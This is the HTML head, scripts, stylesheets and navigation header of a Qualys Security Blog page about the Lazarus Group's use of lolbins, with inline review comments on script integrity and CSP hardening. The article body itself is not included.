<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <!-- Pingdom Real User Monitoring --> <script> var _prum = [['id', '56a14edeabe53deb7ff24334'], ['mark', 'firstbyte', (new Date()).getTime()]]; (function() { var s = document.getElementsByTagName('script')[0] , p = document.createElement('script'); p.async = 'async'; p.src = '//rum-static.pingdom.net/prum.min.js'; s.parentNode.insertBefore(p, s); })(); </script> <!-- End Pingdom Real User Monitoring --> <!-- NOTE(review): the RUM snippet above injects prum.min.js from a protocol-relative URL (//rum-static.pingdom.net). On this https page it resolves to https, but an explicit https: scheme removes any downgrade path if the page is ever served over http. A dynamically injected script cannot carry an integrity attribute, so this origin is best allow-listed in a CSP script-src rather than left to an unpinned third-party fetch. --> <title>LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security Blog</title> <!-- NOTE(review): the inline config below ships WordPress request nonces (_ajax_nonce, _rest_nonce) to the client; that is the normal mechanism for admin-ajax/REST request tokens and they are not credentials, but being inline this script also blocks a strict CSP (no unsafe-inline). Moving it to a nonce- or hash-allowed script would let the page adopt a strict script-src. --> <script data-no-defer="1" data-ezscrex="false" data-cfasync="false" data-pagespeed-no-defer data-cookieconsent="ignore"> var ctPublicFunctions = {"_ajax_nonce":"0e06bd0114","_rest_nonce":"4e518c68f2","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/blog.qualys.com\/wp-json\/","data__cookies_type":"none","data__ajax_type":"admin_ajax","text__wait_for_decoding":"Decoding the contact data, let us a few seconds to finish. 
Anti-Spam by CleanTalk","cookiePrefix":"","wprocket_detected":false} </script> <script data-no-defer="1" data-ezscrex="false" data-cfasync="false" data-pagespeed-no-defer data-cookieconsent="ignore"> var ctPublic = {"_ajax_nonce":"0e06bd0114","settings__forms__check_internal":"0","settings__forms__check_external":"1","settings__forms__search_test":"1","settings__data__bot_detector_enabled":"1","blog_home":"https:\/\/blog.qualys.com\/","pixel__setting":"3","pixel__enabled":false,"pixel__url":"https:\/\/moderate1-v4.cleantalk.org\/pixel\/dba09330c14be9bf43dfb2fba6d7f545.gif","data__email_check_before_post":"1","data__cookies_type":"none","data__key_is_ok":true,"data__visible_fields_required":true,"wl_brandname":"Anti-Spam by CleanTalk","wl_brandname_short":"CleanTalk","ct_checkjs_key":366396619,"emailEncoderPassKey":"9f656c94809af4b53927701d5cba3a56","bot_detector_forms_excluded":"W10=","advancedCacheExists":false,"varnishCacheExists":false,"wc_ajax_add_to_cart":false} </script> <!-- The SEO Framework by Sybre Waaijer --> <link rel="canonical" href="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" /> <meta property="og:type" content="article" /> <meta property="og:locale" content="en_US" /> <meta property="og:site_name" content="Qualys Security Blog" /> <meta property="og:title" content="LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security Blog" /> <meta property="og:url" content="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" /> <meta property="og:image" content="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" /> <meta property="article:published_time" content="2022-02-08T11:24:37+00:00" /> <meta property="article:modified_time" content="2022-12-23T08:09:48+00:00" /> <meta property="article:publisher" content="https://www.facebook.com/qualys" /> <meta 
name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@qualys" /> <meta name="twitter:title" content="LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security Blog" /> <meta name="twitter:image" content="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" /> <script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://blog.qualys.com/#/schema/WebSite","url":"https://blog.qualys.com/","name":"Qualys Security Blog","alternateName":"Qualys, Inc.","description":"Expert network security guidance and news","inLanguage":"en-US","potentialAction":{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://blog.qualys.com/search/{search_term_string}"},"query-input":"required name=search_term_string"},"publisher":{"@type":"Organization","@id":"https://blog.qualys.com/#/schema/Organization","name":"Qualys, Inc.","url":"https://blog.qualys.com/","sameAs":["https://www.facebook.com/qualys","https://twitter.com/qualys","https://www.youtube.com/user/QualysGuard","https://www.linkedin.com/company/qualys"],"logo":{"@type":"ImageObject","url":"https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys.png","contentUrl":"https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys.png","width":512,"height":512}}},{"@type":"WebPage","@id":"https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns","url":"https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns","name":"LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security 
Blog","inLanguage":"en-US","isPartOf":{"@id":"https://blog.qualys.com/#/schema/WebSite"},"breadcrumb":{"@type":"BreadcrumbList","@id":"https://blog.qualys.com/#/schema/BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":"https://blog.qualys.com/","name":"Qualys Security Blog"},{"@type":"ListItem","position":2,"item":"https://blog.qualys.com/category/vulnerabilities-threat-research","name":"Category: Vulnerabilities and Threat Research"},{"@type":"ListItem","position":3,"name":"LolZarus: Lazarus Group Incorporating Lolbins into Campaigns"}]},"potentialAction":{"@type":"ReadAction","target":"https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns"},"datePublished":"2022-02-08T11:24:37+00:00","dateModified":"2022-12-23T08:09:48+00:00","author":{"@type":"Person","@id":"https://blog.qualys.com/#/schema/Person/2e9e1e371053521b97e01a452b121dbe","name":"Akshat Pradhan","description":"Senior Engineer, Threat Research..."}}]}</script> <!-- / The SEO Framework by Sybre Waaijer | 19.58ms meta | 0.43ms boot --> <link rel='dns-prefetch' href='//moderate.cleantalk.org' /> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//static.cloud.coveo.com' /> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='dns-prefetch' href='//v0.wordpress.com' /> <link rel="alternate" type="application/rss+xml" title="Qualys Security Blog » Feed" href="https://blog.qualys.com/feed" /> <link rel="alternate" type="application/rss+xml" title="Qualys Security Blog » Comments Feed" href="https://blog.qualys.com/comments/feed" /> <link rel="alternate" type="application/rss+xml" title="Qualys Security Blog » LolZarus: Lazarus Group Incorporating Lolbins into Campaigns Comments Feed" 
href="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/feed" /> <link rel='stylesheet' id='jetpack_related-posts-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/modules/related-posts/related-posts.css?ver=20240116' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://ik.imagekit.io/qualys/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://ik.imagekit.io/qualys/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://ik.imagekit.io/qualys/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.6.2' media='all' /> <style id='jetpack-sharing-buttons-style-inline-css'> .jetpack-sharing-buttons__services-list{display:flex;flex-direction:row;flex-wrap:wrap;gap:0;list-style-type:none;margin:5px;padding:0}.jetpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__services-list.has-huge-icon-size{font-size:36px}@media print{.jetpack-sharing-buttons__services-list{display:none!important}}.editor-styles-wrapper .wp-block-jetpack-sharing-buttons{gap:0;padding-inline-start:0}ul.jetpack-sharing-buttons__services-list.has-background{padding:1.25em 2.375em} </style> <style id='classic-theme-styles-inline-css'> /*! 
This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 
100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) 
!important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: 
var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: 
var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='ct_public_css-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/cleantalk-spam-protect/css/cleantalk-public.min.css?ver=6.42.1' media='all' /> <link rel='stylesheet' id='community-shared-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style/shared.css?ver=1.0.3' media='all' /> <link rel='stylesheet' 
id='community-shared-30em-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style/shared-min-30em.css?ver=1.0.3' media='screen and (min-width: 30em)' /> <link rel='stylesheet' id='community-shared-60em-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style/shared-min-60em.css?ver=1.0.3' media='screen and (min-width: 60em)' /> <link rel='stylesheet' id='qualys2020-style-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style.css?ver=1.0.3' media='all' /> <link rel='stylesheet' id='qualys2020-highlightjs-dark-css' href='https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/styles/a11y-dark.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='coveo-css' href='https://static.cloud.coveo.com/searchui/v2.10085/2/css/CoveoFullSearch.min.css?ver=6.10085/2/css/CoveoFullSearch.min.css?ver=6.6.2' media='all' integrity='sha512-SvJKQ8/gNL2d8gVWx23GajIUPZAK+F83AI2pXl+pV0X3BfK6R3uBpEHo8CDv1YuIFzfvfs6znp77Amaj3te0xQ==' crossorigin='anonymous' /> <link rel='stylesheet' id='fancybox-styles-css' href='https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css?ver=6.6.2' media='all' /> <!-- NOTE(review): the highlight.js and fancybox stylesheets are fetched from cdnjs without integrity/crossorigin, while the coveo stylesheet just above is SRI-pinned. A third-party CSS swap can exfiltrate page content or restyle the UI for phishing, so pin both the same way (placeholder: integrity="sha512-<HASH OF THE PINNED FILE>" crossorigin="anonymous"); SRI hashes the response body, so the ?ver query string does not interfere. --> <script id="jetpack_related-posts-js-extra"> var related_posts_js_options = {"post_heading":"h4"}; </script> <script src="https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20240116" id="jetpack_related-posts-js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" id="jquery-js" integrity='sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==' crossorigin='anonymous' referrerpolicy='no-referrer'></script> <script data-pagespeed-no-defer src="https://ik.imagekit.io/qualys/wp-content/plugins/cleantalk-spam-protect/js/apbct-public-bundle.min.js?ver=6.42.1" id="ct_public_functions-js"></script> <script src="https://moderate.cleantalk.org/ct-bot-detector-wrapper.js?ver=6.42.1" id="ct_bot_detector-js"></script> <!-- NOTE(review): apbct-public-bundle.min.js and ct-bot-detector-wrapper.js (the latter served from the third-party origin moderate.cleantalk.org) load without integrity/crossorigin, unlike jquery.min.js above. Both execute with full page privileges, so a compromised or silently updated upstream file would run unchecked; pin them with an SRI hash where the upstream version is stable, and constrain the remaining dynamic loads with a CSP script-src allow-list. --> <script 
src="https://ik.imagekit.io/qualys/wp-includes/js/codemirror/codemirror.min.js?ver=5.29.1-alpha-ee20357" id="wp-codemirror-js"></script> <link rel="https://api.w.org/" href="https://blog.qualys.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://blog.qualys.com/wp-json/wp/v2/posts/29363" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://blog.qualys.com/xmlrpc.php?rsd" /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://blog.qualys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://blog.qualys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns&format=xml" /> <style>img#wpstats{display:none}</style> <link rel="icon" href="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-150x150.png" sizes="32x32" /> <link rel="icon" href="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-300x300.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-300x300.png" /> <meta name="msapplication-TileImage" content="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-300x300.png" /> <style id="wp-custom-css"> .custom-testimonial-block { background: #1D2737; padding: 60px 40px; display: flex; align-items: flex-start; flex-direction: column; } .custom-testimonial-block .wp-block-media-text__media { align-self: flex-start; max-width: 200px; margin: 0 0 40px; } .custom-testimonial-block .wp-block-media-text__content { direction: inherit; padding: 0 0; font-style: italic; font-weight: 500; } .custom-testimonial-block 
.wp-block-media-text__content blockquote.wp-block-quote { padding: 0 0 0 40px; margin: 0; position: relative; color: #FFF; } .custom-testimonial-block .wp-block-media-text__content blockquote.wp-block-quote::before { content: ""; position: absolute; left: 0; top: 0; width: 36px; height: 27px; background: url(https://ik.imagekit.io/qualys/image/quote-marks-red.svg) left top no-repeat transparent; display: block; } .custom-testimonial-block .wp-block-media-text__content blockquote.wp-block-quote cite { font-family: Gotham, sans-serif; font-style: normal; font-size: 16px; display: block; line-height: 1.45; color: #FFF; } .custom-testimonial-block .wp-block-media-text__content p { color: #FFF; font-weight: 600; font-style: italic; } @media (min-width: 600px) { .custom-testimonial-block { flex-direction: row; } .custom-testimonial-block .wp-block-media-text__media { max-width: unset; margin: 0; } .custom-testimonial-block .wp-block-media-text__content blockquote.wp-block-quote { margin: 0 0 0 20px; padding: 0 40px; } } </style> <!-- Google Tag Manager --> <script> if (!window.location.search.match(/[?&;]dnt=1([;&]|$)/)) { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-W7DWPS'); } </script> <!-- End Google Tag Manager --> </head> <body class="post-template-default single single-post postid-29363 single-format-standard"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W7DWPS" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W7DWPS" height="0" 
width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div class="q-header__background"> <header class="q-header site-header" id="masthead"> <div class="q-header__container"> <div class="q-hamberger-menu"> <div class="q-hamburger-menu__icon"> <svg width="23" height="23" viewBox="0 0 23 23" version="1.1" xmlns="http://www.w3.org/2000/svg"> <g fill="currentColor"> <rect id="Rectangle1" x="0" y="5" width="23" height="3" rx="1.5"></rect> <rect id="Rectangle2" x="0" y="10" width="23" height="3" rx="1.5"></rect> <rect id="Rectangle3" x="0" y="15" width="23" height="3" rx="1.5"></rect> </g> </svg> </div> <div class="q-hamburger-menu__container"> <ul id="primary-menu" class="q-header__nav"><li id="menu-item-26462" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-26462 q-navigation__item"><a href="https://success.qualys.com/discussions/s/">Discussions</a> <ul class="sub-menu q-header__nav-sub"> <li id="menu-item-26463" class="q-header__nav-back menu-item menu-item-type-custom menu-item-object-custom menu-item-26463 q-navigation__item"><a href="#back">Back to main menu</a></li> <li id="menu-item-26464" class="q-browser-by-topic menu-item menu-item-type-custom menu-item-object-custom menu-item-26464 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/">BROWSE BY TOPIC</a><span class="menu-item-description">BROWSE BY TOPIC</span></li> <li id="menu-item-26465" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26465 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRIWA4/asset-management">Global IT Asset Management</a></li> <li id="menu-item-26466" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26466 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRwWAO/it-security">IT Security</a></li> <li id="menu-item-26467" 
class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26467 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIS1WAO/compliance">Compliance</a></li> <li id="menu-item-26468" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26468 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRnWAO/cloud-container">Cloud & Container Security</a></li> <li id="menu-item-26469" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26469 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HISCWA4/web-app-security">Web App Security</a></li> <li id="menu-item-26470" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26470 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRfWAO/certificate-security">Certificate Security & SSL Labs</a></li> <li id="menu-item-26471" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26471 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIR8WAO/developer">Developer API</a></li> <li id="menu-item-26562" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26562 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRAWA4/qualys-cloud-platform">Cloud Platform</a></li> <li id="menu-item-26472" class="q-button__start-a-discussion q-button__light-blue q-button-with-arrow menu-item menu-item-type-custom menu-item-object-custom menu-item-26472 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/#start-a-discussion">Start a discussion</a></li> </ul> </li> <li id="menu-item-26473" class="q-header_blog-link menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-26473 q-navigation__item"><a href="https://blog.qualys.com/">Blog</a></li> <li 
id="menu-item-26474" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26474 q-navigation__item"><a href="https://www.qualys.com/training/">Training</a></li> <li id="menu-item-26475" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26475 q-navigation__item"><a href="https://www.qualys.com/documentation/">Docs</a></li> <li id="menu-item-26476" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26476 q-navigation__item"><a href="https://success.qualys.com/customersupport/">Support</a></li> <li id="menu-item-35252" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-35252 q-navigation__item"><a href="https://success.qualys.com/support/s/standards">Trust</a></li> <li class="q-header__nav-underline"></li></ul> </div> </div> <a class="q-header__logo q-header__logo-community" href="https://community.qualys.com/" title="Qualys Community"> <span class="q-logo-shield"> <svg width="111" height="35" alt="Qualys" class="q-logo__horizontal" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 933.884 293.111"><path d="M123.073 0c80.158 0 120.462 42.888 120.462 42.888s4.608 31.746 1.667 95.667c-4.443 96.56-122.1 154.55-122.111 154.556s-117.666-57.996-122.11-154.556c-2.941-63.921 1.667-95.667 1.667-95.667s40.268-42.888 120.425-42.888z" fill="#ed2e26"/><path d="M394.178 75.824a70.586 70.586 0 0 0-70.506 70.506c0 23.533 9.89 44.5 28.6 60.641 17.522 15.113 42.649 25.532 71.66 30.36 4.149-2.279 11.994-9.969 14.492-15.236-21.375-3.687-31.178-7.346-31.178-7.346a40.676 40.676 0 0 0 8.23-1.652c28.556-8.009 49.489-36.214 49.208-66.766-.357-38.876-31.628-70.507-70.506-70.507zm0 120.714a50.208 50.208 0 1 1 50.209-50.208 50.265 50.265 0 0 1-50.209 50.208zM915.488 189.828a11.292 11.292 0 0 1 15.377 0 11.587 11.587 0 0 1 0 15.6 11.3 11.3 0 0 1-15.377 0 11.587 11.587 0 0 1 0-15.6zm1.556 14.095a8.969 8.969 0 0 0 12.264 0 9.539 9.539 0 0 0 0-12.609 9.025 